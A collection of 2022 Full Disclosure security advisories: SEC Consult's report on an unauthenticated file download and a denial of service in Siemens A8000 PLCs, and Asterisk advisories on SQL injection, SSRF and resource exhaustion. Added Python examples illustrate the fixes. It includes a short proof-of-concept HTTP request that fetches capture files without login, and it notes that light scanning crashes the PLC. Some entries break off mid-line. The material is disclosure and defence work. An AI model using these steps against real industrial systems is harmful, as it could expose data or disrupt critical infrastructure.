[FD] SEC Consult SA-20220413 :: Missing Authentication at File Download & Denial of Service in Siemens A8000 PLC
SEC Consult Vulnerability Lab Security Advisory < 20220413-0 >
=======================================================================
              title: Missing Authentication at File Download & Denial of Service
            product: Siemens A8000 CP-8050/CP-8031 SICAM WEB
 vulnerable version: < SICAM WEB Version 05.80 / < Firmware Package 04.80
      fixed version: SICAM WEB V05.80 / Firmware Package 04.80
         CVE number: CVE-2022-27480
             impact: Medium
           homepage: https://www.siemens.com
              found: 2021-11-10
                 by: SEC Consult Vulnerability Lab
                     This vulnerability was discovered during the research
                     cooperation initiative "OT Cyber Security Lab" between
                     Verbund AG and SEC Consult Group.
                     Steffen Robertz (Office Vienna)
                     Gerhard Hechenberger (Office Vienna)
                     Thomas Weber (Office Vienna)
                     An integrated part of SEC Consult, an Atos company
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers. By combining the real and the digital worlds, we empower our customers to transform their industries and markets, helping them to transform the everyday for billions of people."

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation:
------------------------
Update to the current firmware in order to fix the missing authentication vulnerability. Siemens will not fix the denial of service vulnerability.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description:
-----------------------------------
1) Missing Authentication at File Download (CVE-2022-27480)
Several files that can be created by an authorized user are placed in the web server's root directory. The user can then download these files by pressing a UI button. However, the files are not deleted automatically after the user downloads them. The filenames are static and the download does not require any authentication. Therefore, they can be retrieved by anybody later.

2) Denial of Service Condition
The PLC will stop responding to any connection attempts as soon as a light network load is placed on it. This effectively shuts down the management interfaces.

Proof of concept:
-----------------
1) Missing Authentication at File Download (CVE-2022-27480)
First, a file has to be created. This is possible by logging into SICAM Web. As an example, a network traffic capture can be created by navigating to "Monitoring & Simulation" -> "Ethernet Packet Capture".

The following request shows how another client downloads the resulting wireshark.zip file without sending any authentication headers.

-------------------------------------------------------------------------
GET /wireshark.zip HTTP/1.1
Host: [IP]
-------------------------------------------------------------------------

The server responds with the created capture file:

-------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Type: application/zip
Accept-Ranges: bytes
Cache-Control: max-age=0, private
Content-Length: 370
Server: A8000
[...]
PKÃV\S!ÃM>wireshark0.pcap
[...]
-------------------------------------------------------------------------

2) Denial of Service Condition
Putting a light network load on the PLC's interfaces causes a denial of service condition. In the tests it was enough to run a directory bruteforce with 5 threads in order to shut down all management interfaces. After the scan stopped, it took several minutes for the PLC to come back online.

Vulnerable / tested versions:
-----------------------------
The following product has been tested:
* Siemens A8000 CP-8050 SICAM Web 05.50

Vendor contact timeline:
------------------------
2022-02-07: Contacting vendor through productc...@siemens.com
2022-02-07: Siemens opened ticket, Issue 1 is already known for another product (CVE-2021-45034)
2022-02-09: Provided further information about the PLC version to Siemens
2022-02-10: Information forwarded to developers
2022-02-15: Siemens identified the right model, does not consider DoS as valid finding, as it does not stop the control loop from running and it is not an edge device
2022-03-22: Siemens asks to move disclosure date to their patch day on April 12th. SEC Consult agrees. Siemens now recognizes the DoS condition, but is accepting the risk and won't patch.
2022-03-28:
[FD] AST-2022-003: func_odbc: Possible SQL Injection
Asterisk Project Security Advisory - AST-2022-003

Product: Asterisk
Summary: func_odbc: Possible SQL Injection
Nature of Advisory: SQL injection
Susceptibility: Remote unauthenticated sessions
Severity: Low
Exploits Known: No
Reported On: January 5, 2022
Reported By: Leandro Dardini
Posted On: April 14, 2022
Last Updated On: April 12, 2022
Advisory Contact: Jcolp AT sangoma DOT com
CVE Name: CVE-2022-26651

Description: Some databases can use backslashes to escape certain characters, such as backticks. If input is provided to func_odbc which includes backslashes it is possible for func_odbc to construct a broken SQL query and the SQL query to fail. Additionally, while it has not yet been reproduced, this security advisory is also being published to cover the case of SQL injection with the aim of database manipulation by an outside party.

Modules Affected: func_odbc

Resolution: A new dialplan function, SQL_ESC_BACKSLASHES, has been added to the func_odbc module which will escape backslashes. If your usage of func_odbc may have input which includes backslashes and your database uses backslashes to escape backticks, then use the dialplan function to escape the backslashes. A second option is to disable support for backslashes for escaping in your database if the underlying database supports it.
Affected Versions:
Product | Release Series | Affected
Asterisk Open Source | 16.x | All versions
Asterisk Open Source | 18.x | All versions
Asterisk Open Source | 19.x | All versions
Certified Asterisk | 16.x | All versions

Corrected In:
Product | Release
Asterisk Open Source | 16.25.2, 18.11.2, 19.3.2
Certified Asterisk | 16.8-cert14

Patches:
Patch URL | Revision
https://downloads.digium.com/pub/security/AST-2022-003-16.diff | Asterisk 16
https://downloads.digium.com/pub/security/AST-2022-003-18.diff | Asterisk 18
https://downloads.digium.com/pub/security/AST-2022-003-19.diff | Asterisk 19
https://downloads.digium.com/pub/security/AST-2022-003-16.8.diff | Certified Asterisk 16.8

Links:
https://issues.asterisk.org/jira/browse/ASTERISK-29838
https://downloads.asterisk.org/pub/security/AST-2022-003.html

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest version will be posted at https://downloads.digium.com/pub/security/AST-2022-003.pdf and
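To make the backslash problem in AST-2022-003 concrete, here is an added Python illustration (not Asterisk code): two helpers mimic what SQL_ESC and SQL_ESC_BACKSLASHES do to a dialplan value, and a minimal scanner checks whether a query built from that value still has balanced string literals on a database where backslash is an escape character. The query template, table names and the escaping order are this example's assumptions.

```python
def sql_esc(value: str) -> str:
    """Mimic SQL_ESC: double single quotes so they stay inside the literal."""
    return value.replace("'", "''")


def sql_esc_backslashes(value: str) -> str:
    """Mimic SQL_ESC_BACKSLASHES (the AST-2022-003 fix): double backslashes."""
    return value.replace("\\", "\\\\")


def build_query(value: str, escape_backslashes: bool) -> str:
    """Expand a constructed func_odbc-style readsql template with a dialplan value.
    Backslashes are escaped before quotes; the order is this example's choice."""
    if escape_backslashes:
        value = sql_esc_backslashes(value)
    return f"SELECT name FROM users WHERE ext = '{sql_esc(value)}'"


def literal_balanced(query: str) -> bool:
    """Scan single-quoted literals the way a backslash-escaping database does:
    backslash escapes the next character and '' is an embedded quote.
    Returns False when a literal is still open at the end of the query."""
    in_literal = False
    i = 0
    while i < len(query):
        c = query[i]
        if not in_literal:
            in_literal = c == "'"
        elif c == "\\":
            i += 1  # escaped character: this is what swallows the closing quote
        elif c == "'":
            if i + 1 < len(query) and query[i + 1] == "'":
                i += 1  # doubled quote, still inside the literal
            else:
                in_literal = False
        i += 1
    return not in_literal
```

A value ending in a backslash leaves the literal open with SQL_ESC alone (the "broken SQL query" the advisory describes) and is rendered harmlessly once SQL_ESC_BACKSLASHES is applied as well.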
[FD] AST-2022-002: res_stir_shaken: SSRF vulnerability with Identity header
Asterisk Project Security Advisory - AST-2022-002

Product: Asterisk
Summary: res_stir_shaken: SSRF vulnerability with Identity header
Nature of Advisory: Server-side request forgery
Susceptibility: Remote unauthenticated access
Severity: Major
Exploits Known: No
Reported On: Jun 10, 2021
Reported By: Clint Ruoho
Posted On: Apr 14, 2022
Last Updated On: April 13, 2022
Advisory Contact: bford AT sangoma DOT com
CVE Name: CVE-2022-26499

Description: When using STIR/SHAKEN, it's possible to send arbitrary requests like GET to interfaces such as localhost using the Identity header.

Modules Affected: res_stir_shaken

Resolution: If you are using STIR/SHAKEN in Asterisk, upgrade to one of the versions listed below to get a new configuration option: stir_shaken_profile. This can be configured in stir_shaken.conf and set on a per endpoint basis in pjsip.conf. This option will take priority over the stir_shaken option. The stir_shaken_profile will contain the stir_shaken option (attest, verify, or both), as well as ACL configuration options to permit and deny specific IP addresses / hosts. The ACL will be used for the public key URL we receive in the Identity header, which is used to tell Asterisk where to download the public certificate. An ACL from acl.conf can be used, but you can specify your own permit and deny lines within the profile itself. A combination of both can also be used.

Note that this patch contains changes that affect the same area as the patch from AST-2022-001. It is recommended that you upgrade to a listed version, otherwise you might encounter merge conflicts.
Affected Versions:
Product | Release Series | Affected
Asterisk Open Source | 16.x | 16.15.0 and after
Asterisk Open Source | 18.x | All versions
Asterisk Open Source | 19.x | All versions

Corrected In:
Product | Release
Asterisk Open Source | 16.25.2, 18.11.2, 19.3.2

Patches:
Patch URL | Revision
https://downloads.digium.com/pub/security/AST-2022-002-16.diff | Asterisk 16
https://downloads.digium.com/pub/security/AST-2022-002-18.diff | Asterisk 18
https://downloads.digium.com/pub/security/AST-2022-002-19.diff | Asterisk 19

Links:
https://issues.asterisk.org/jira/browse/ASTERISK-29476
https://downloads.asterisk.org/pub/security/AST-2022-002.html

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest version will be posted at https://downloads.digium.com/pub/security/AST-2022-002.pdf and https://downloads.digium.com/pub/security/AST-2022-002.html

Revision History:
Date | Editor | Revisions Made
[FD] AST-2022-001: res_stir_shaken: resource exhaustion with large files
Asterisk Project Security Advisory - AST-2022-001

Product: Asterisk
Summary: res_stir_shaken: resource exhaustion with large files
Nature of Advisory: Resource exhaustion
Susceptibility: Remote unauthenticated access
Severity: Major
Exploits Known: No
Reported On: Jan 21, 2022
Reported By: Ben Ford
Posted On: Apr 14, 2022
Last Updated On: April 13, 2022
Advisory Contact: bford AT sangoma DOT com
CVE Name: CVE-2022-26498

Description: When using STIR/SHAKEN, it's possible to download files that are not certificates. These files could be much larger than what you would expect to download.

Modules Affected: res_stir_shaken

Resolution: If you are using STIR/SHAKEN in Asterisk, upgrade to one of the versions listed below. Asterisk now checks the downloaded file to see if it's actually a certificate or if it is larger than what is expected. If not upgrading, the curl_timeout option in stir_shaken.conf should be utilized so that downloads do not last an extended period of time.

Affected Versions:
Product | Release Series | Affected
Asterisk Open Source | 16.x | 16.15.0 and after
Asterisk Open Source | 18.x | All versions
Asterisk Open Source | 19.x | All versions

Corrected In:
Product | Release
Asterisk Open Source | 16.25.2, 18.11.2, 19.3.2

Patches:
Patch URL | Revision
https://downloads.digium.com/pub/security/AST-2022-001-16.diff | Asterisk 16
https://downloads.digium.com/pub/security/AST-2022-001-18.diff | Asterisk 18
https://downloads.digium.com/pub/security/AST-2022-001-19.diff | Asterisk 19

Links:
https://issues.asterisk.org/jira/browse/ASTERISK-29872
https://downloads.asterisk.org/pub/security/AST-2022-001.html

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest version will be posted at https://downloads.digium.com/pub/security/AST-2022-001.pdf and https://downloads.digium.com/pub/security/AST-2022-001.html

Revision History:
Date | Editor | Revisions Made
Apr 13, 2022 | Ben Ford | Initial revision

Asterisk Project Security Advisory - AST-2022-001
Copyright © 01/19/2022 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
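The two res_stir_shaken fixes above (AST-2022-002: an ACL applied to the public key URL from the Identity header before any request is made; AST-2022-001: the downloaded object must be a certificate and no larger than expected) are shown together in this added Python sketch, which is not Asterisk's code. The size cap, the ACL entries, the host table and the PEM body are constructed for the example, and the resolver and fetcher are injectable so it runs offline.

```python
import ipaddress, re, socket
from urllib.parse import urlparse

MAX_CERT_BYTES = 8192  # assumed cap for this example, not Asterisk's own value

def info_url(identity_header: str) -> str:
    """Pull the info=<url> parameter (public key URL) out of an Identity header."""
    m = re.search(r"info=<([^>]+)>", identity_header)
    if not m:
        raise ValueError("Identity header carries no info= parameter")
    return m.group(1)

def host_permitted(host, permit, deny, resolve=socket.gethostbyname) -> bool:
    """Deny wins, then a permit match is required; a real fetcher must also connect to the address it checked."""
    try:
        addr = ipaddress.ip_address(resolve(host))
    except (OSError, ValueError, KeyError):
        return False
    if any(addr in ipaddress.ip_network(n) for n in deny):
        return False
    return any(addr in ipaddress.ip_network(n) for n in permit)

def fetch_certificate(url, permit, deny, fetch, resolve=socket.gethostbyname) -> bytes:
    """ACL check before the request, size cap and PEM check after; fetch(url, limit) returns at most limit+1 bytes."""
    host = urlparse(url).hostname
    if not host or not host_permitted(host, permit, deny, resolve):
        raise PermissionError(f"{host!r} rejected by stir_shaken ACL")
    body = fetch(url, MAX_CERT_BYTES)
    if len(body) > MAX_CERT_BYTES:
        raise ValueError("download larger than a certificate should be")
    if not (body.startswith(b"-----BEGIN CERTIFICATE-----") and body.rstrip().endswith(b"-----END CERTIFICATE-----")):
        raise ValueError("downloaded object is not a PEM certificate")
    return body

# Constructed sample ACL, host table and response bodies so everything runs offline.
PERMIT = ["203.0.113.0/24"]
DENY = ["127.0.0.0/8", "10.0.0.0/8"]
HOSTS = {"certs.example": "203.0.113.10", "localhost": "127.0.0.1"}
PEM = b"-----BEGIN CERTIFICATE-----\nMIIB...constructed...\n-----END CERTIFICATE-----\n"
BODIES = {"https://certs.example/ca.pem": PEM,
          "https://certs.example/big.bin": b"A" * (MAX_CERT_BYTES + 1)}

def outcome(url) -> str:
    """Classify fetch_certificate's result for the sample data: ok / acl / size / format."""
    try:
        fetch_certificate(url, PERMIT, DENY, lambda u, n: BODIES[u][: n + 1], HOSTS.__getitem__)
        return "ok"
    except PermissionError:
        return "acl"
    except ValueError as e:
        return "size" if "larger" in str(e) else "format"
```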